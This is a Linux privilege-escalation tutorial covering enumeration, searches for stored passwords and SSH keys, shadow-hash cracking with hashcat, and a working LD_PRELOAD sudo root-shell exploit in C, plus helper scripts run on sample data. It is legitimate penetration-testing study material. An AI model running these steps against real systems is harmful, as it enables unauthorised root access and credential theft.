Linux Privilege-Escalation

Typically the goal is to become the user with uid=0, i.e. root.

initial enumeration

Typically we start with system enumeration

$ hostname
 
# kernel release and architecture, e.g., 2.6.32-5-amd64
$ uname -a 
 
# also shows the kernel version, plus the compiler it was built with
$ cat /proc/version
 
# the pre-login banner usually names the distribution and its version
$ cat /etc/issue
 
# running processes; services running as root are the interesting ones: ps aux | grep root
$ ps aux 

Another common step is user enumeration

# check command history
$ history
 
# who am i
$ whoami
$ id
 
# can I execute commands as root?
$ sudo -l
 
# search for SUID binaries (look each one up on GTFOBins)
$ find / -type f -perm -u=s 2>/dev/null
 
# check for other user accounts
$ cat /etc/passwd
$ ls /home
 
# check for groups
$ cat /etc/group
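
The /etc/passwd listing above is long on a real box; what matters is whether there are extra uid-0 accounts and which accounts can actually log in. The following shell function is an added example, not part of the original notes: it reviews a passwd-format file (defaulting to /etc/passwd) and prints exactly those two findings. The sample passwd data is constructed for the demonstration and does not come from a real host.

```sh
#!/bin/sh
# Added example (not from the original notes): review a passwd-format file for
# accounts worth a closer look: extra uid-0 accounts and accounts that can log in.
# Usage: passwd_review [FILE]   (FILE defaults to /etc/passwd, "-" reads stdin)
passwd_review() {
    awk -F: '
        # any uid-0 account other than root is effectively a second root login
        $3 == 0 && $1 != "root" { printf "uid0-alias:%s\n", $1 }
        # accounts with a usable shell are candidates for su / password reuse
        $7 != "" && $7 !~ /(nologin|false|sync|halt|shutdown)$/ {
            printf "shell:%s:%s\n", $1, $7
        }
    ' "${1:-/etc/passwd}"
}

# constructed sample (not a real host's /etc/passwd) so the example runs offline
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
backup:x:0:0:leftover admin account:/home/backup:/bin/sh
alice:x:1000:1000:alice:/home/alice:/bin/bash
bob:x:1001:1001:bob:/home/bob:/usr/sbin/nologin'

printf '%s\n' "$SAMPLE_PASSWD" | passwd_review -
```

On the sample this flags `backup` as a uid-0 alias and lists root, backup and alice as accounts with a shell; daemon and bob are skipped because they cannot log in. Run `passwd_review` without arguments on the target to apply the same check to the live /etc/passwd.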

We should also enumerate the network

# check IP configuration
$ ifconfig -a
$ ip a
 
# routing information
$ route
$ ip route
 
# check the ARP cache: other hosts this box has talked to on the local segment
$ arp -a
$ ip neigh
 
# listening services and established connections (ss replaces netstat on newer systems)
$ netstat -tulpn
$ ss -tulpn

Search the typical locations for passwords:

# search bash history
$ history
$ cat $HOME/.bash_history
 
# check configuration files in $HOME and in /etc for plaintext credentials
$ grep -rnwi --color=always -e "PASSWORD" / 2> /dev/null
$ locate password
 
# search for SSH private keys (id_rsa), password files, etc.
$ find / -name id_rsa 2> /dev/null

automated tools

There are many tools that automate these checks:

  • LinPEAS
  • LinEnum
  • linux-exploit-suggester
  • linuxprivchecker.py

exploitation

kernel exploits

  • match the kernel version from uname -a against known exploits (e.g. with linux-exploit-suggester); a failed kernel exploit can crash the box, so try these last

weak file permissions

  • e.g., a world-readable /etc/shadow (or a writable /etc/passwd)
  • combine the two files: unshadow /etc/passwd /etc/shadow > creds.txt
  • crack the sha512crypt ($6$) hashes: hashcat -m 1800 creds.txt rockyou.txt -O
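
The three bullets above are one procedure: find out whether the credential files are abusable, extract the hashes that are actually crackable, and pick the right hashcat mode. The script below is an added example, not part of the original notes; it generalises the `-m 1800` case by reading the crypt(3) `$id$` prefix of each hash (md5crypt, sha256crypt, sha512crypt, bcrypt) instead of assuming sha512crypt. The shadow lines are constructed placeholders, not real hashes, and will not crack.

```sh
#!/bin/sh
# Added example (not from the original notes): decide how /etc/passwd and
# /etc/shadow can be abused from the current account, pull the crackable hashes
# out of a shadow file, and map each hash's $id$ prefix to the hashcat mode.

# cred_file_check [PASSWD] [SHADOW] -> readable-shadow | writable-passwd | none
cred_file_check() {
    passwd="${1:-/etc/passwd}"
    shadow="${2:-/etc/shadow}"
    if [ -r "$shadow" ]; then
        echo readable-shadow       # unshadow + offline cracking
    elif [ -w "$passwd" ]; then
        echo writable-passwd       # worth reporting: passwd is writable by this account
    else
        echo none
    fi
}

# crackable_hashes [SHADOW] ("-" for stdin) -> user:hash for accounts that have
# a real crypt(3) hash; locked ("!") and disabled ("*") entries are skipped
crackable_hashes() {
    awk -F: '$2 ~ /^\$/ { print $1 ":" $2 }' "${1:-/etc/shadow}"
}

# hashcat_mode HASH -> the -m value for the crypt(3) scheme named by the prefix
hashcat_mode() {
    case "$1" in
        '$1$'*)        echo 500  ;;         # md5crypt
        '$5$'*)        echo 7400 ;;         # sha256crypt
        '$6$'*)        echo 1800 ;;         # sha512crypt (the -m 1800 in the notes)
        '$2'[aby]'$'*) echo 3200 ;;         # bcrypt
        '$y$'*)        echo unsupported ;;  # yescrypt: no hashcat mode, use john
        *)             echo unknown ;;
    esac
}

# constructed shadow lines with placeholder hashes (not real credentials)
SAMPLE_SHADOW='root:$6$saltsalt$notarealhash:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
alice:$1$abc$notarealhash:19000:0:99999:7:::
bob:!:19000:0:99999:7:::'

cred_file_check
printf '%s\n' "$SAMPLE_SHADOW" | crackable_hashes - | while IFS=: read -r user hash; do
    echo "$user: hashcat -m $(hashcat_mode "$hash") creds.txt rockyou.txt -O"
done
```

On the sample only root (sha512crypt, -m 1800) and alice (md5crypt, -m 500) come out; daemon and bob have no hash. Run hashcat on the unshadow output rather than on the raw shadow file, and note that -O selects the optimized kernels at the cost of a maximum candidate password length.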

sudo exploits

  • is LD_PRELOAD preserved? (sudo -l lists env_keep+=LD_PRELOAD under the Defaults entries)

Create a new preloaded library with the following source code:

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>      /* setuid, setgid */
 
/* runs when the library is loaded, before the target program's main() */
void _init() {
    unsetenv("LD_PRELOAD");   /* don't preload ourselves into the spawned shell */
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

compile and preload it (LD_PRELOAD needs an absolute path, otherwise ld.so looks for shell.so in the library directories rather than the current directory; any command you are allowed to run via sudo works as the target, man is just an example):

$ gcc -fPIC -shared -nostartfiles -o $(pwd)/shell.so shell.c
$ sudo LD_PRELOAD=$(pwd)/shell.so man
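
Before compiling anything it pays to read the sudo -l output carefully: the attack only works when LD_PRELOAD is in env_keep, and you need a command you are actually allowed to run. The function below is an added example, not part of the original notes; it parses sudo -l output from stdin, reports whether LD_PRELOAD is preserved and lists the runnable commands (with the runas part and tags such as NOPASSWD: stripped). The sudo -l output it is fed here is constructed for the demonstration; on a target you would pipe the real `sudo -l` into it.

```sh
#!/bin/sh
# Added example (not from the original notes): parse `sudo -l` output and report
# whether the LD_PRELOAD trick applies and which commands can carry it.
# Usage: sudo -l | sudo_preload_check      (exit status 1 if LD_PRELOAD is not kept)
sudo_preload_check() {
    awk '
        /env_keep/ && /LD_PRELOAD/ { kept = 1 }
        /^[ \t]*\(/ {
            sub(/^[ \t]*\([^)]*\)[ \t]*/, "")      # strip the "(root)" runas part
            while (sub(/^[A-Z]+:[ \t]*/, "")) ;     # strip tags such as NOPASSWD:
            cmds[n++] = $0
        }
        END {
            if (!kept) { print "LD_PRELOAD is not preserved by sudo"; exit 1 }
            print "LD_PRELOAD is preserved; commands usable as the preload target:"
            for (i = 0; i < n; i++) print "  " cmds[i]
        }
    '
}

# constructed `sudo -l` output for user alice (not captured from a real host)
SAMPLE_SUDO_L='Matching Defaults entries for alice on target:
    env_reset, env_keep+=LD_PRELOAD, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User alice may run the following commands on target:
    (root) NOPASSWD: /usr/bin/man
    (root) /usr/bin/apt-get'

printf '%s\n' "$SAMPLE_SUDO_L" | sudo_preload_check
```

With the sample input this reports LD_PRELOAD as preserved and names /usr/bin/man and /usr/bin/apt-get as targets; the NOPASSWD entry is the better choice because it does not prompt for alice's password. Pick one of the listed commands as the argument to the `sudo LD_PRELOAD=... ` line above.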